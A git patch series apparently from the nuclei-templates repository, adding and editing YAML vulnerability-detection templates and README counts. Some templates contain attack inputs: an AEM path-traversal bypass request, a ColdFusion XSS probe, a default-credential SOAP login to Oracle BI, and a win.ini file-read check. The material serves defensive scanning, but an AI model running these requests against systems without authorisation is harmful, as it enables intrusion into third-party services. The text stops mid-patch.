0196/4083] Auto Update README [Thu Jul 1 13:29:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f7bc95fede..12a43642c1 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 370 | vulnerabilities | 201 | exposed-panels | 173 | +| cves | 370 | vulnerabilities | 201 | exposed-panels | 174 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1389 files**. +**121 directories, 1390 files**. From 39eb91a582a403f5979e2b4c9f1b1e34abb37f17 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Jul 2021 22:23:08 +0530 Subject: [PATCH 0197/4083] Update aem-crx-bypass.yaml --- misconfiguration/aem/aem-crx-bypass.yaml | 19 +++++++++++++------ 1 file changed, 13 insertions(+), 6 deletions(-) diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml index 4e6a8e4bb2..0fb736625e 100644 --- a/misconfiguration/aem/aem-crx-bypass.yaml +++ b/misconfiguration/aem/aem-crx-bypass.yaml @@ -10,21 +10,28 @@ info: requests: - raw: - | - GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 + User-Agent: curl/123 Referer: {{BaseURL}} Connection: close Accept-Encoding: gzip, deflate + - | + GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + Host: {{Hostname}} + User-Agent: curl/123 + Referer: {{BaseURL}} + Connection: close + Accept-Encoding: gzip, deflate matchers-condition: and matchers: - type: word part: body word: - - '"results:"' - - '"path:"' - - '"pid":' + - 'buildCount' + - 'downloadName' + - 'acHandling' condition: and - type: word @@ -34,4 +41,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 453b09d3ff9ba1e3db08ca0d432156e574d05ed8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Jul 2021 22:31:01 +0530 Subject: [PATCH 0198/4083] Create coldfusion-debug-xss.yaml --- .../other/coldfusion-debug-xss.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/other/coldfusion-debug-xss.yaml diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml new file mode 100644 index 0000000000..3d7442c252 --- /dev/null +++ b/vulnerabilities/other/coldfusion-debug-xss.yaml @@ -0,0 +1,27 @@ +id: coldfusion-debug-xss + +info: + name: Adobe ColdFusion Debug Page XSS + author: dhiyaneshDK + severity: medium + tags: adobe,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)' + - '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"cf_main_cf" src="javascript:alert(1)"' + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From a53902e99c25652eb1c62974f7375813a42cd2fa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Jul 2021 22:34:38 +0530 Subject: [PATCH 0199/4083] Create jboss-seam-debug-page.yaml --- exposures/logs/jboss-seam-debug-page.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/logs/jboss-seam-debug-page.yaml diff --git a/exposures/logs/jboss-seam-debug-page.yaml b/exposures/logs/jboss-seam-debug-page.yaml new file mode 100644 index 0000000000..da47db57cc --- /dev/null +++ b/exposures/logs/jboss-seam-debug-page.yaml @@ -0,0 +1,23 @@ +id: jboss-seam-debug-page + +info: + name: Jboss Seam Debug Page Enabled + author: dhiyaneshDK + severity: medium + tags: logs,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/debug.seam" + + matchers-condition: and + matchers: + - type: word + words: + - "SeamDebugPage" + - "org.jboss.seam" + + - type: status + status: + - 200 From dad74b473867ffcabc104e4242369922ae6d26d2 Mon Sep 17 00:00:00 2001 From: b0yd Date: Thu, 1 Jul 2021 12:14:33 -0700 Subject: [PATCH 0200/4083] LISTSERV Maestro --- .../lsoft/listserv_maestro_rce.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/lsoft/listserv_maestro_rce.yaml diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml new file mode 100644 index 0000000000..3c5414a0fe --- /dev/null +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -0,0 +1,30 @@ +id: maestro-unauth-rce + +info: + name: LISTSERV Maestro <= 9.0-8 RCE + author: b0yd + severity: high + description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. + +requests: + - method: GET + path: + - "{{BaseURL}}/lui/" + matchers: + - type: regex + regex: + - 'LISTSERV Maestro\s+9\.0-[123456780]' + - 'LISTSERV Maestro\s+[5678]' + condition: or + + - method: GET + path: + - "{{BaseURL}}/hub/" + matchers: + + - type: regex + regex: + - 'Administration Hub 9\.0-[123456780]' + - 'Administration Hub [5678]' + part: body + condition: or From 5f779266bc57a8bc3ca1d3467cb28a3250b013bb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Jul 2021 08:16:57 +0530 Subject: [PATCH 0201/4083] Create jetty-showcontexts-enable.yaml --- .../jetty-showcontexts-enable.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 misconfiguration/jetty-showcontexts-enable.yaml diff --git a/misconfiguration/jetty-showcontexts-enable.yaml b/misconfiguration/jetty-showcontexts-enable.yaml new file mode 100644 index 0000000000..8616aab012 --- /dev/null +++ b/misconfiguration/jetty-showcontexts-enable.yaml @@ -0,0 +1,23 @@ +id: jetty-showcontexts-enable + +info: + name: Jetty showContexts Enable in DefaultHandler + author: dhiyaneshDK + severity: low + tags: jetty + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Contexts known to this server are:" + condition: and + + - type: status + status: + - 200 From 2fa4382ef5426cbf78c30ef4daf7772ef5f62b4f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Jul 2021 08:23:42 +0530 Subject: [PATCH 0202/4083] Create jfrog-unauth-build-exposed.yaml --- .../other/jfrog-unauth-build-exposed.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 vulnerabilities/other/jfrog-unauth-build-exposed.yaml diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml new file mode 100644 index 0000000000..7ea549cdb9 --- /dev/null +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -0,0 +1,34 @@ +id: jfrog-unauth-build-exposed + +info: + name: JFrog Unauthentication Builds + author: dhiyaneshDK + severity: medium + tags: jfrog + +requests: + - raw: + - | + POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4271.0 Safari/537.36 + X-Requested-With: XMLHttpRequest + Content-Type: application/json + + {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} + matchers: + - type: word + words: + - "last_build_number" + - "build_name" + condition: and + part: body + + - type: word + words: + - application/json + part: header + + - type: status + status: + - 200 From 2787fc01b6d3d601f37886444d881913a43ddd87 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Jul 2021 08:25:40 +0530 Subject: [PATCH 0203/4083] Update jfrog-unauth-build-exposed.yaml --- vulnerabilities/other/jfrog-unauth-build-exposed.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index 7ea549cdb9..bda35c4118 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -14,7 +14,7 @@ requests: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4271.0 Safari/537.36 X-Requested-With: XMLHttpRequest Content-Type: application/json - + {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} matchers: - type: word From d9b8eb5db5495f6a1c58e615012889d3224e26f3 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Fri, 2 Jul 2021 09:36:33 +0200 Subject: [PATCH 0204/4083] Add tpl to detect Combodo iTop instance See https://www.combodo.com/itop-193 --- exposed-panels/itop-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/itop-panel.yaml diff --git a/exposed-panels/itop-panel.yaml b/exposed-panels/itop-panel.yaml new file mode 100644 index 0000000000..325d65c255 --- /dev/null +++ b/exposed-panels/itop-panel.yaml @@ -0,0 +1,22 @@ +id: itop-panel + +info: + name: iTop Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a Combodo iTop instance via the login page + tags: panel,itop + +requests: + - method: GET + path: + - "{{BaseURL}}/pages/UI.php" + - "{{BaseURL}}/simple/pages/UI.php" + + matchers: + - type: word + words: + - "Welcome to iTop" + - "iTop login" + part: body + condition: or \ No newline at end of file From 95de938720693a72b319122eae5feeceaf5c1c68 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Fri, 2 Jul 2021 10:07:39 +0200 Subject: [PATCH 0205/4083] Add detection for SAP Fiori See https://www.sap.com/products/fiori.html --- exposed-panels/sapfiori-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/sapfiori-panel.yaml diff --git a/exposed-panels/sapfiori-panel.yaml b/exposed-panels/sapfiori-panel.yaml new file mode 100644 index 0000000000..9acdf43bd3 --- /dev/null +++ b/exposed-panels/sapfiori-panel.yaml @@ -0,0 +1,22 @@ +id: sapfiori-panel + +info: + name: SAP Fiori Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a SAP Fiori instance via the login page + tags: panel,sap,fiori + +requests: + - method: GET + path: + - "{{BaseURL}}/fiori" + - "{{BaseURL}}/" + + matchers: + - type: word + words: + - "/fiori" + - "fioriLogin" + part: body + condition: or \ No newline at end of file From 07c983a9024b24ca7a66ebc2a8a3d309cf2672cd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Jul 2021 08:27:11 +0000 Subject: [PATCH 0206/4083] Auto Update README [Fri Jul 2 08:27:11 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 12a43642c1..9aad7b8dca 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 370 | vulnerabilities | 201 | exposed-panels | 174 | +| cves | 370 | vulnerabilities | 202 | exposed-panels | 174 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1390 files**. +**121 directories, 1391 files**. From b9583c58febd0c9778665b97566c82d1d7ea7715 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Fri, 2 Jul 2021 10:40:49 +0200 Subject: [PATCH 0207/4083] Add CSOD detection See https://www.cornerstoneondemand.com/ --- exposed-panels/csod-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/csod-panel.yaml diff --git a/exposed-panels/csod-panel.yaml b/exposed-panels/csod-panel.yaml new file mode 100644 index 0000000000..e4dbb8a17f --- /dev/null +++ b/exposed-panels/csod-panel.yaml @@ -0,0 +1,23 @@ +id: csod-panel + +info: + name: CornerStoneOnDemand Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a CornerStoneOnDemand (CSOD - www.cornerstoneondemand.com) instance via the login page + tags: panel,csod + +requests: + - method: GET + path: + - "{{BaseURL}}/" + redirects: true + max-redirects: 5 + + matchers: + - type: word + words: + - "csod-custom" + - "csodcommon" + part: body + condition: or \ No newline at end of file From 6814ceaef27c8562bf05718094daed6581c642f9 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Fri, 2 Jul 2021 10:46:56 +0200 Subject: [PATCH 0208/4083] Fix linter error --- exposed-panels/csod-panel.yaml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/exposed-panels/csod-panel.yaml b/exposed-panels/csod-panel.yaml index e4dbb8a17f..7ce990f7d8 100644 --- a/exposed-panels/csod-panel.yaml +++ b/exposed-panels/csod-panel.yaml @@ -1,23 +1,20 @@ id: csod-panel - info: name: CornerStoneOnDemand Instance Detection Template author: righettod severity: info - description: Try to detect the presence of a CornerStoneOnDemand (CSOD - www.cornerstoneondemand.com) instance via the login page + description: Try to detect the presence of a CornerStoneOnDemand (CSOD www.cornerstoneondemand.com) instance via the login page tags: panel,csod - requests: - method: GET path: - "{{BaseURL}}/" redirects: true max-redirects: 5 - matchers: - type: word words: - "csod-custom" - "csodcommon" part: body - condition: or \ No newline at end of file + condition: or From 959ccc1286f0151afeeefe48c35886625efc1400 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 2 Jul 2021 14:39:07 +0530 Subject: [PATCH 0209/4083] Update csod-panel.yaml --- exposed-panels/csod-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/csod-panel.yaml b/exposed-panels/csod-panel.yaml index 7ce990f7d8..b1bbc95572 100644 --- a/exposed-panels/csod-panel.yaml +++ b/exposed-panels/csod-panel.yaml @@ -8,7 +8,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" redirects: true max-redirects: 5 matchers: From ca12789c717dd2c5920aabecca17c011505eaea0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Jul 2021 09:10:29 +0000 Subject: [PATCH 0210/4083] Auto Update README [Fri Jul 2 09:10:29 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9aad7b8dca..cabe2ec340 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 370 | vulnerabilities | 202 | exposed-panels | 174 | +| cves | 370 | vulnerabilities | 202 | exposed-panels | 175 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1391 files**. +**121 directories, 1392 files**. From f476d84cd8b5cc305a1c70c2b7c634a331e4a1db Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 2 Jul 2021 15:02:26 +0530 Subject: [PATCH 0211/4083] Added additional path --- exposed-panels/sapfiori-panel.yaml | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/exposed-panels/sapfiori-panel.yaml b/exposed-panels/sapfiori-panel.yaml index 9acdf43bd3..bb5e0cd842 100644 --- a/exposed-panels/sapfiori-panel.yaml +++ b/exposed-panels/sapfiori-panel.yaml @@ -11,12 +11,20 @@ requests: - method: GET path: - "{{BaseURL}}/fiori" - - "{{BaseURL}}/" + - "{{BaseURL}}/irj/portal/fiori" + matchers-condition: or matchers: - type: word words: - - "/fiori" - - "fioriLogin" + - 'fioriLogin' + - 'action="/fiori"' part: body - condition: or \ No newline at end of file + condition: and + + - type: word + words: + - "UIPPortalPath" + - "/irj/portal/fiori" + part: body + condition: and \ No newline at end of file From 33ec1b09ed71aa932ee02c4117df96d0b96e7c46 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Jul 2021 09:38:11 +0000 Subject: [PATCH 0212/4083] Auto Update README [Fri Jul 2 09:38:11 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cabe2ec340..481bb03218 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 370 | vulnerabilities | 202 | exposed-panels | 175 | +| cves | 370 | vulnerabilities | 202 | exposed-panels | 176 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1392 files**. +**121 directories, 1393 files**. From 5f9a6aa798b9a83cfc80c744fdc91ad431e2f4fd Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 2 Jul 2021 15:10:40 +0530 Subject: [PATCH 0213/4083] Update itop-panel.yaml --- exposed-panels/itop-panel.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/exposed-panels/itop-panel.yaml b/exposed-panels/itop-panel.yaml index 325d65c255..367b274f54 100644 --- a/exposed-panels/itop-panel.yaml +++ b/exposed-panels/itop-panel.yaml @@ -13,10 +13,15 @@ requests: - "{{BaseURL}}/pages/UI.php" - "{{BaseURL}}/simple/pages/UI.php" + matchers-condition: and matchers: - type: word words: - "Welcome to iTop" - "iTop login" part: body - condition: or \ No newline at end of file + condition: or + + - type: status + status: + - 200 \ No newline at end of file From 9c7acbe56bc8c0dcaadd590b01ea53013513fb0a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Jul 2021 09:41:26 +0000 Subject: [PATCH 0214/4083] Auto Update README [Fri Jul 2 09:41:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 481bb03218..d444a1d182 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 370 | vulnerabilities | 202 | exposed-panels | 176 | +| cves | 370 | vulnerabilities | 202 | exposed-panels | 177 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1393 files**. +**121 directories, 1394 files**. From b8601f990f85243b6131a1d185913b10bec21b5e Mon Sep 17 00:00:00 2001 From: Mehedi Hasan Remon Date: Fri, 2 Jul 2021 16:20:26 +0600 Subject: [PATCH 0215/4083] Create glances-unauth.yaml --- exposed-panels/glances-unauth.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 exposed-panels/glances-unauth.yaml diff --git a/exposed-panels/glances-unauth.yaml b/exposed-panels/glances-unauth.yaml new file mode 100644 index 0000000000..164e7203f0 --- /dev/null +++ b/exposed-panels/glances-unauth.yaml @@ -0,0 +1,18 @@ +id: glances-unauth + +info: + name: Glances Unauthenticated Panel + author: remonsec + severity: low + description: Glance running web server mode & Unauthenticated leads system monitoring to info disclosure + reference: https://glances.readthedocs.io/en/latest/quickstart.html#how-to-protect-your-server-or-web-server-with-a-login-password + tags: exposure + +requests: + - method: GET + path: + - '{{BaseURL}}:61208' + matchers: + - type: status + status: + - 200 From db61d85e75f9fdf74827be4a05c26ce1e7dd8d8d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 2 Jul 2021 17:14:03 +0530 Subject: [PATCH 0216/4083] minor updates --- .../unauthenticated-glances.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) rename exposed-panels/glances-unauth.yaml => misconfiguration/unauthenticated-glances.yaml (71%) diff --git a/exposed-panels/glances-unauth.yaml b/misconfiguration/unauthenticated-glances.yaml similarity index 71% rename from exposed-panels/glances-unauth.yaml rename to misconfiguration/unauthenticated-glances.yaml index 164e7203f0..1816f766b3 100644 --- a/exposed-panels/glances-unauth.yaml +++ b/misconfiguration/unauthenticated-glances.yaml @@ -1,4 +1,4 @@ -id: glances-unauth +id: unauthenticated-glances info: name: Glances Unauthenticated Panel @@ -11,8 +11,17 @@ info: requests: - method: GET path: - - '{{BaseURL}}:61208' + - '{{BaseURL}}' + + matchers-condition: and matchers: - type: status status: - 200 + + - type: word + part: body + words: + - "Monitor" + + From 5b91ef07a65bc0d03281d4a34d7f340a802895da Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 2 Jul 2021 17:15:32 +0530 Subject: [PATCH 0217/4083] Update unauthenticated-glances.yaml --- misconfiguration/unauthenticated-glances.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/misconfiguration/unauthenticated-glances.yaml b/misconfiguration/unauthenticated-glances.yaml index 1816f766b3..b486511351 100644 --- a/misconfiguration/unauthenticated-glances.yaml +++ b/misconfiguration/unauthenticated-glances.yaml @@ -22,6 +22,4 @@ requests: - type: word part: body words: - - "Monitor" - - + - "Monitor" \ No newline at end of file From 55f14f6732f99d1f2786e3d2f6a461c39a0bc0c5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Jul 2021 11:47:08 +0000 Subject: [PATCH 0218/4083] Auto Update README [Fri Jul 2 11:47:08 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d444a1d182..6e3257f7a1 100644 --- a/README.md +++ b/README.md @@ -40,11 +40,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 370 | vulnerabilities | 202 | exposed-panels | 177 | | takeovers | 69 | exposures | 107 | technologies | 108 | -| misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | +| misconfiguration | 72 | workflows | 32 | miscellaneous | 26 | | default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1394 files**. +**121 directories, 1395 files**. From 70f5a462394ed9088611149d30e854ebeca6bc7d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 2 Jul 2021 17:51:03 +0530 Subject: [PATCH 0219/4083] minor update --- .../oracle/oracle-bi-default-credentials.yaml | 48 ++++++++++--------- 1 file changed, 26 insertions(+), 22 deletions(-) diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index 33fc346e55..1219ef549f 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -9,30 +9,34 @@ info: requests: - raw: - | - POST /xmlpserver/services/XMLPService HTTP/1.1 - Content-Type: text/xml - SOAPAction: "" - Cookie: JSESSIONID=rY0rMSBGerKQxDoGHdxkLZ7iLj3GgAjDzEfix5ntVX4bjctPXvbL!-387043440 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Encoding: gzip,deflate - Content-Length: 771 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 - Host: {{Hostname}} - Connection: Keep-alive + POST /xmlpserver/services/XMLPService HTTP/1.1 + Content-Type: text/xml + SOAPAction: "" + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Encoding: gzip,deflate + Content-Length: 771 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 + Host: {{Hostname}} + Connection: Keep-alive - - - - - Administrator - Administrator - XXX - - - + + + + + Administrator + Administrator + bi + + + + matchers-condition: and matchers: - - type: regex - regex: + - type: status + status: + - 200 + + - type: word + words: - 'createSessionReturn' part: body From 16da6c99803580a963cc786ea13786ba33f72705 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 2 Jul 2021 18:20:58 +0530 Subject: [PATCH 0220/4083] strict matchers --- cves/2017/CVE-2017-9822.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index 3204b86686..257292c0b8 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml @@ -26,4 +26,10 @@ requests: - type: word words: - '[extensions]' + - 'for 16-bit app support' part: body + condition: and + + - type: status + status: + - 404 \ No newline at end of file From e2a0f93f79f6cd696277a4c53460a5468e2a4a86 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 2 Jul 2021 18:24:31 +0530 Subject: [PATCH 0221/4083] misc updates --- cves/2018/CVE-2018-2628.yaml | 2 +- cves/2018/CVE-2018-2893.yaml | 2 +- cves/2020/CVE-2020-1938.yaml | 2 +- .../jolokia/jolokia-heap-info-disclosure.yaml | 35 ++++++++++--------- 4 files changed, 22 insertions(+), 19 deletions(-) diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml index 613a0793b1..0421d15888 100644 --- a/cves/2018/CVE-2018-2628.yaml +++ b/cves/2018/CVE-2018-2628.yaml @@ -5,7 +5,7 @@ info: author: milo2012 severity: high reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 - tags: cve,cve2018,oracle,weblogic + tags: cve,cve2018,oracle,weblogic,network network: - inputs: diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml index 888becc02f..4fc9fa8c42 100644 --- a/cves/2018/CVE-2018-2893.yaml +++ b/cves/2018/CVE-2018-2893.yaml @@ -4,7 +4,7 @@ info: name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893) author: milo2012 severity: high - tags: cve,cve2018,weblogic + tags: cve,cve2018,weblogic,network reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL network: diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml index b09a48519c..14c505aa53 100644 --- a/cves/2020/CVE-2020-1938.yaml +++ b/cves/2020/CVE-2020-1938.yaml @@ -5,7 +5,7 @@ info: author: milo2012 severity: high reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 - tags: cve,cve2020,apache,tomcat,lfi + tags: cve,cve2020,apache,tomcat,lfi,network network: - inputs: diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml index 840be8e54a..cd7dd6cd13 100644 --- a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml +++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml @@ -9,23 +9,26 @@ info: requests: - raw: - | - POST /jolokia/ HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Type: application/x-www-form-urlencoded - Content-Length: 136 + POST /jolokia/ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. + Accept-Language: en-GB,en;q=0.5 + Accept-Encoding: 